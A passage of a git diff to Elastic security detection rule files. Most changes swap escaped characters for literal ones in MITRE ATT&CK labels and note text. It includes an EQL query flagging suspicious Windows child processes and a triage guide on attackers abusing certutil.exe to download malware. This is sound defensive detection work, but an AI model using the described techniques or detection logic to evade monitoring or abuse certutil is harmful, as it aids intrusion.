/* suspicious child processes */\n (process.parent.name:(\"SearchProtocolHost.exe\", \"taskhost.exe\", \"csrss.exe\") and not process.name:(\"werfault.exe\", \"wermgr.exe\", \"WerFaultSecure.exe\")) or\n (process.parent.name:\"autochk.exe\" and not process.name:(\"chkdsk.exe\", \"doskey.exe\", \"WerFault.exe\")) or\n (process.parent.name:\"smss.exe\" and not process.name:(\"autochk.exe\", \"smss.exe\", \"csrss.exe\", \"wininit.exe\", \"winlogon.exe\", \"setupcl.exe\", \"WerFault.exe\")) or\n (process.parent.name:\"wermgr.exe\" and not process.name:(\"WerFaultSecure.exe\", \"wermgr.exe\", \"WerFault.exe\")) or\n (process.parent.name:\"conhost.exe\" and not process.name:(\"mscorsvw.exe\", \"wermgr.exe\", \"WerFault.exe\", \"WerFaultSecure.exe\"))\n )\n", "references": [ "https://github.com/sbousseaden/Slides/blob/master/Hunting%20MindMaps/PNG/Windows%20Processes%20TH.map.png", @@ -54,7 +54,7 @@ ], "risk_score": 47, "rule_id": "35df0dd8-092d-4a83-88c1-5151a804f31b", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/3688577a-d196-11ec-90b0-f661ea17fbce_104.json b/packages/security_detection_engine/kibana/security_rule/3688577a-d196-11ec-90b0-f661ea17fbce_104.json index 31a16e44e75..342473202df 100644 --- a/packages/security_detection_engine/kibana/security_rule/3688577a-d196-11ec-90b0-f661ea17fbce_104.json +++ b/packages/security_detection_engine/kibana/security_rule/3688577a-d196-11ec-90b0-f661ea17fbce_104.json @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/3688577a-d196-11ec-90b0-f661ea17fbce_105.json b/packages/security_detection_engine/kibana/security_rule/3688577a-d196-11ec-90b0-f661ea17fbce_105.json index ac78117bab0..19b2cbe746b 100644 --- a/packages/security_detection_engine/kibana/security_rule/3688577a-d196-11ec-90b0-f661ea17fbce_105.json +++ b/packages/security_detection_engine/kibana/security_rule/3688577a-d196-11ec-90b0-f661ea17fbce_105.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/3688577a-d196-11ec-90b0-f661ea17fbce_106.json b/packages/security_detection_engine/kibana/security_rule/3688577a-d196-11ec-90b0-f661ea17fbce_106.json index a46302b0033..34735a73c75 100644 --- a/packages/security_detection_engine/kibana/security_rule/3688577a-d196-11ec-90b0-f661ea17fbce_106.json +++ b/packages/security_detection_engine/kibana/security_rule/3688577a-d196-11ec-90b0-f661ea17fbce_106.json @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/3688577a-d196-11ec-90b0-f661ea17fbce_107.json b/packages/security_detection_engine/kibana/security_rule/3688577a-d196-11ec-90b0-f661ea17fbce_107.json index 1b3aec506b0..ec3e351a788 100644 --- a/packages/security_detection_engine/kibana/security_rule/3688577a-d196-11ec-90b0-f661ea17fbce_107.json +++ b/packages/security_detection_engine/kibana/security_rule/3688577a-d196-11ec-90b0-f661ea17fbce_107.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/3688577a-d196-11ec-90b0-f661ea17fbce_108.json b/packages/security_detection_engine/kibana/security_rule/3688577a-d196-11ec-90b0-f661ea17fbce_108.json index 61d4aeafaf9..9de3d284b5a 100644 --- a/packages/security_detection_engine/kibana/security_rule/3688577a-d196-11ec-90b0-f661ea17fbce_108.json +++ b/packages/security_detection_engine/kibana/security_rule/3688577a-d196-11ec-90b0-f661ea17fbce_108.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/36a8e048-d888-4f61-a8b9-0f9e2e40f317_102.json b/packages/security_detection_engine/kibana/security_rule/36a8e048-d888-4f61-a8b9-0f9e2e40f317_102.json index 2a3e9b25208..6b2d8ebe43e 100644 --- a/packages/security_detection_engine/kibana/security_rule/36a8e048-d888-4f61-a8b9-0f9e2e40f317_102.json +++ b/packages/security_detection_engine/kibana/security_rule/36a8e048-d888-4f61-a8b9-0f9e2e40f317_102.json @@ -49,7 +49,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/36a8e048-d888-4f61-a8b9-0f9e2e40f317_103.json b/packages/security_detection_engine/kibana/security_rule/36a8e048-d888-4f61-a8b9-0f9e2e40f317_103.json index 7fde3151161..cc633d3b324 100644 --- a/packages/security_detection_engine/kibana/security_rule/36a8e048-d888-4f61-a8b9-0f9e2e40f317_103.json +++ b/packages/security_detection_engine/kibana/security_rule/36a8e048-d888-4f61-a8b9-0f9e2e40f317_103.json @@ -48,7 +48,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/36a8e048-d888-4f61-a8b9-0f9e2e40f317_104.json b/packages/security_detection_engine/kibana/security_rule/36a8e048-d888-4f61-a8b9-0f9e2e40f317_104.json index b33be5a1579..0be1cd2d7a9 100644 --- a/packages/security_detection_engine/kibana/security_rule/36a8e048-d888-4f61-a8b9-0f9e2e40f317_104.json +++ b/packages/security_detection_engine/kibana/security_rule/36a8e048-d888-4f61-a8b9-0f9e2e40f317_104.json @@ -49,7 +49,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/36a8e048-d888-4f61-a8b9-0f9e2e40f317_105.json b/packages/security_detection_engine/kibana/security_rule/36a8e048-d888-4f61-a8b9-0f9e2e40f317_105.json index 30b7c55946a..edcae5e9185 100644 --- a/packages/security_detection_engine/kibana/security_rule/36a8e048-d888-4f61-a8b9-0f9e2e40f317_105.json +++ b/packages/security_detection_engine/kibana/security_rule/36a8e048-d888-4f61-a8b9-0f9e2e40f317_105.json @@ -50,7 +50,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -72,7 +72,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/36c48a0c-c63a-4cbc-aee1-8cac87db31a9_1.json b/packages/security_detection_engine/kibana/security_rule/36c48a0c-c63a-4cbc-aee1-8cac87db31a9_1.json index 91efd0f6f1e..3043fee4a20 100644 --- a/packages/security_detection_engine/kibana/security_rule/36c48a0c-c63a-4cbc-aee1-8cac87db31a9_1.json +++ b/packages/security_detection_engine/kibana/security_rule/36c48a0c-c63a-4cbc-aee1-8cac87db31a9_1.json @@ -33,7 +33,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/3728c08d-9b70-456b-b6b8-007c7d246128_1.json b/packages/security_detection_engine/kibana/security_rule/3728c08d-9b70-456b-b6b8-007c7d246128_1.json index 4b1b4fe0a2c..1622dde6673 100644 --- a/packages/security_detection_engine/kibana/security_rule/3728c08d-9b70-456b-b6b8-007c7d246128_1.json +++ b/packages/security_detection_engine/kibana/security_rule/3728c08d-9b70-456b-b6b8-007c7d246128_1.json @@ -52,7 +52,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -98,7 +98,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/3728c08d-9b70-456b-b6b8-007c7d246128_2.json b/packages/security_detection_engine/kibana/security_rule/3728c08d-9b70-456b-b6b8-007c7d246128_2.json index 5d930e26be8..cc49ddeb05f 100644 --- a/packages/security_detection_engine/kibana/security_rule/3728c08d-9b70-456b-b6b8-007c7d246128_2.json +++ b/packages/security_detection_engine/kibana/security_rule/3728c08d-9b70-456b-b6b8-007c7d246128_2.json @@ -53,7 +53,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -99,7 +99,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/3728c08d-9b70-456b-b6b8-007c7d246128_3.json b/packages/security_detection_engine/kibana/security_rule/3728c08d-9b70-456b-b6b8-007c7d246128_3.json index a6c0e50e5b9..e0d007f3ee3 100644 --- a/packages/security_detection_engine/kibana/security_rule/3728c08d-9b70-456b-b6b8-007c7d246128_3.json +++ b/packages/security_detection_engine/kibana/security_rule/3728c08d-9b70-456b-b6b8-007c7d246128_3.json @@ -54,7 +54,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -100,7 +100,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/378f9024-8a0c-46a5-aa08-ce147ac73a4e_102.json b/packages/security_detection_engine/kibana/security_rule/378f9024-8a0c-46a5-aa08-ce147ac73a4e_102.json index f9e1ec49cd4..d43ac2069f0 100644 --- a/packages/security_detection_engine/kibana/security_rule/378f9024-8a0c-46a5-aa08-ce147ac73a4e_102.json +++ b/packages/security_detection_engine/kibana/security_rule/378f9024-8a0c-46a5-aa08-ce147ac73a4e_102.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/378f9024-8a0c-46a5-aa08-ce147ac73a4e_103.json b/packages/security_detection_engine/kibana/security_rule/378f9024-8a0c-46a5-aa08-ce147ac73a4e_103.json index 1cc21dad9c7..2d0523f5b31 100644 --- a/packages/security_detection_engine/kibana/security_rule/378f9024-8a0c-46a5-aa08-ce147ac73a4e_103.json +++ b/packages/security_detection_engine/kibana/security_rule/378f9024-8a0c-46a5-aa08-ce147ac73a4e_103.json @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/378f9024-8a0c-46a5-aa08-ce147ac73a4e_104.json b/packages/security_detection_engine/kibana/security_rule/378f9024-8a0c-46a5-aa08-ce147ac73a4e_104.json index cbcdec2633d..e20d4198868 100644 --- a/packages/security_detection_engine/kibana/security_rule/378f9024-8a0c-46a5-aa08-ce147ac73a4e_104.json +++ b/packages/security_detection_engine/kibana/security_rule/378f9024-8a0c-46a5-aa08-ce147ac73a4e_104.json @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/378f9024-8a0c-46a5-aa08-ce147ac73a4e_205.json b/packages/security_detection_engine/kibana/security_rule/378f9024-8a0c-46a5-aa08-ce147ac73a4e_205.json index 8f5be755ad3..9a3f483a164 100644 --- a/packages/security_detection_engine/kibana/security_rule/378f9024-8a0c-46a5-aa08-ce147ac73a4e_205.json +++ b/packages/security_detection_engine/kibana/security_rule/378f9024-8a0c-46a5-aa08-ce147ac73a4e_205.json @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/37994bca-0611-4500-ab67-5588afe73b77_104.json b/packages/security_detection_engine/kibana/security_rule/37994bca-0611-4500-ab67-5588afe73b77_104.json index 70e5b7a5978..5df5eab805a 100644 --- a/packages/security_detection_engine/kibana/security_rule/37994bca-0611-4500-ab67-5588afe73b77_104.json +++ b/packages/security_detection_engine/kibana/security_rule/37994bca-0611-4500-ab67-5588afe73b77_104.json @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/37994bca-0611-4500-ab67-5588afe73b77_105.json b/packages/security_detection_engine/kibana/security_rule/37994bca-0611-4500-ab67-5588afe73b77_105.json index 8f8396b726a..bad6b5fea3d 100644 --- a/packages/security_detection_engine/kibana/security_rule/37994bca-0611-4500-ab67-5588afe73b77_105.json +++ b/packages/security_detection_engine/kibana/security_rule/37994bca-0611-4500-ab67-5588afe73b77_105.json @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/37b211e8-4e2f-440f-86d8-06cc8f158cfa_105.json b/packages/security_detection_engine/kibana/security_rule/37b211e8-4e2f-440f-86d8-06cc8f158cfa_105.json index 9e74d6d4bc9..1256774b5df 100644 --- a/packages/security_detection_engine/kibana/security_rule/37b211e8-4e2f-440f-86d8-06cc8f158cfa_105.json +++ b/packages/security_detection_engine/kibana/security_rule/37b211e8-4e2f-440f-86d8-06cc8f158cfa_105.json @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/37b211e8-4e2f-440f-86d8-06cc8f158cfa_106.json b/packages/security_detection_engine/kibana/security_rule/37b211e8-4e2f-440f-86d8-06cc8f158cfa_106.json index 94c8158346d..5afb15531f7 100644 --- a/packages/security_detection_engine/kibana/security_rule/37b211e8-4e2f-440f-86d8-06cc8f158cfa_106.json +++ b/packages/security_detection_engine/kibana/security_rule/37b211e8-4e2f-440f-86d8-06cc8f158cfa_106.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/37b211e8-4e2f-440f-86d8-06cc8f158cfa_107.json b/packages/security_detection_engine/kibana/security_rule/37b211e8-4e2f-440f-86d8-06cc8f158cfa_107.json index a63c2c58d85..903ae68290c 100644 --- a/packages/security_detection_engine/kibana/security_rule/37b211e8-4e2f-440f-86d8-06cc8f158cfa_107.json +++ b/packages/security_detection_engine/kibana/security_rule/37b211e8-4e2f-440f-86d8-06cc8f158cfa_107.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/37b211e8-4e2f-440f-86d8-06cc8f158cfa_208.json b/packages/security_detection_engine/kibana/security_rule/37b211e8-4e2f-440f-86d8-06cc8f158cfa_208.json index 6604ff9ede2..b594706c2df 100644 --- a/packages/security_detection_engine/kibana/security_rule/37b211e8-4e2f-440f-86d8-06cc8f158cfa_208.json +++ b/packages/security_detection_engine/kibana/security_rule/37b211e8-4e2f-440f-86d8-06cc8f158cfa_208.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/37f638ea-909d-4f94-9248-edd21e4a9906_102.json b/packages/security_detection_engine/kibana/security_rule/37f638ea-909d-4f94-9248-edd21e4a9906_102.json index 757d7af3337..12baf584e01 100644 --- a/packages/security_detection_engine/kibana/security_rule/37f638ea-909d-4f94-9248-edd21e4a9906_102.json +++ b/packages/security_detection_engine/kibana/security_rule/37f638ea-909d-4f94-9248-edd21e4a9906_102.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/37f638ea-909d-4f94-9248-edd21e4a9906_103.json b/packages/security_detection_engine/kibana/security_rule/37f638ea-909d-4f94-9248-edd21e4a9906_103.json index f82a6a6c719..df63a829e73 100644 --- a/packages/security_detection_engine/kibana/security_rule/37f638ea-909d-4f94-9248-edd21e4a9906_103.json +++ b/packages/security_detection_engine/kibana/security_rule/37f638ea-909d-4f94-9248-edd21e4a9906_103.json @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/37f638ea-909d-4f94-9248-edd21e4a9906_104.json b/packages/security_detection_engine/kibana/security_rule/37f638ea-909d-4f94-9248-edd21e4a9906_104.json index 03f38c43348..246d5a2e9c6 100644 --- a/packages/security_detection_engine/kibana/security_rule/37f638ea-909d-4f94-9248-edd21e4a9906_104.json +++ b/packages/security_detection_engine/kibana/security_rule/37f638ea-909d-4f94-9248-edd21e4a9906_104.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/37f638ea-909d-4f94-9248-edd21e4a9906_105.json b/packages/security_detection_engine/kibana/security_rule/37f638ea-909d-4f94-9248-edd21e4a9906_105.json index 7377c149f10..b4716646fb8 100644 --- a/packages/security_detection_engine/kibana/security_rule/37f638ea-909d-4f94-9248-edd21e4a9906_105.json +++ b/packages/security_detection_engine/kibana/security_rule/37f638ea-909d-4f94-9248-edd21e4a9906_105.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/3805c3dc-f82c-4f8d-891e-63c24d3102b0_102.json b/packages/security_detection_engine/kibana/security_rule/3805c3dc-f82c-4f8d-891e-63c24d3102b0_102.json index b64518d3c05..cdf4db13a6c 100644 --- a/packages/security_detection_engine/kibana/security_rule/3805c3dc-f82c-4f8d-891e-63c24d3102b0_102.json +++ b/packages/security_detection_engine/kibana/security_rule/3805c3dc-f82c-4f8d-891e-63c24d3102b0_102.json @@ -50,7 +50,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/3805c3dc-f82c-4f8d-891e-63c24d3102b0_103.json b/packages/security_detection_engine/kibana/security_rule/3805c3dc-f82c-4f8d-891e-63c24d3102b0_103.json index ee503b1c601..c88a28eacb9 100644 --- a/packages/security_detection_engine/kibana/security_rule/3805c3dc-f82c-4f8d-891e-63c24d3102b0_103.json +++ b/packages/security_detection_engine/kibana/security_rule/3805c3dc-f82c-4f8d-891e-63c24d3102b0_103.json @@ -48,7 +48,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/3805c3dc-f82c-4f8d-891e-63c24d3102b0_104.json b/packages/security_detection_engine/kibana/security_rule/3805c3dc-f82c-4f8d-891e-63c24d3102b0_104.json index 8b2d5f3a68b..4dc0a7914f0 100644 --- a/packages/security_detection_engine/kibana/security_rule/3805c3dc-f82c-4f8d-891e-63c24d3102b0_104.json +++ b/packages/security_detection_engine/kibana/security_rule/3805c3dc-f82c-4f8d-891e-63c24d3102b0_104.json @@ -48,7 +48,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/3805c3dc-f82c-4f8d-891e-63c24d3102b0_105.json b/packages/security_detection_engine/kibana/security_rule/3805c3dc-f82c-4f8d-891e-63c24d3102b0_105.json index a548528bd42..b53545fa077 100644 --- a/packages/security_detection_engine/kibana/security_rule/3805c3dc-f82c-4f8d-891e-63c24d3102b0_105.json +++ b/packages/security_detection_engine/kibana/security_rule/3805c3dc-f82c-4f8d-891e-63c24d3102b0_105.json @@ -47,7 +47,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/3805c3dc-f82c-4f8d-891e-63c24d3102b0_106.json b/packages/security_detection_engine/kibana/security_rule/3805c3dc-f82c-4f8d-891e-63c24d3102b0_106.json index be186cc328e..7e41c3411cf 100644 --- a/packages/security_detection_engine/kibana/security_rule/3805c3dc-f82c-4f8d-891e-63c24d3102b0_106.json +++ b/packages/security_detection_engine/kibana/security_rule/3805c3dc-f82c-4f8d-891e-63c24d3102b0_106.json @@ -47,7 +47,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/3805c3dc-f82c-4f8d-891e-63c24d3102b0_207.json b/packages/security_detection_engine/kibana/security_rule/3805c3dc-f82c-4f8d-891e-63c24d3102b0_207.json index 81b433bf6b6..d8dad2463c4 100644 --- a/packages/security_detection_engine/kibana/security_rule/3805c3dc-f82c-4f8d-891e-63c24d3102b0_207.json +++ b/packages/security_detection_engine/kibana/security_rule/3805c3dc-f82c-4f8d-891e-63c24d3102b0_207.json @@ -47,7 +47,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/3838e0e3-1850-4850-a411-2e8c5ba40ba8_104.json b/packages/security_detection_engine/kibana/security_rule/3838e0e3-1850-4850-a411-2e8c5ba40ba8_104.json index 854acfcb4c7..d8cbb34a24a 100644 --- a/packages/security_detection_engine/kibana/security_rule/3838e0e3-1850-4850-a411-2e8c5ba40ba8_104.json +++ b/packages/security_detection_engine/kibana/security_rule/3838e0e3-1850-4850-a411-2e8c5ba40ba8_104.json @@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Network Connection via Certutil", - "note": "## Triage and analysis\n\n### Investigating Network Connection via Certutil\n\nAttackers can abuse `certutil.exe` to download malware, offensive security tools, and certificates from external sources in order to take the next steps in a compromised environment.\n\nThis rule looks for network events where `certutil.exe` contacts IP ranges other than the ones specified in [IANA IPv4 Special-Purpose Address Registry](https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml)\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate if the downloaded file was executed.\n- Determine the context in which `certutil.exe` and the file were run.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the downloaded file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. If trusted software uses this command and the triage has not identified anything suspicious, this alert can be closed as a false positive.\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Network Connection via Certutil\n\nAttackers can abuse `certutil.exe` to download malware, offensive security tools, and certificates from external sources in order to take the next steps in a compromised environment.\n\nThis rule looks for network events where `certutil.exe` contacts IP ranges other than the ones specified in [IANA IPv4 Special-Purpose Address Registry](https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml)\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate if the downloaded file was executed.\n- Determine the context in which `certutil.exe` and the file were run.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the downloaded file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. If trusted software uses this command and the triage has not identified anything suspicious, this alert can be closed as a false positive.\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent 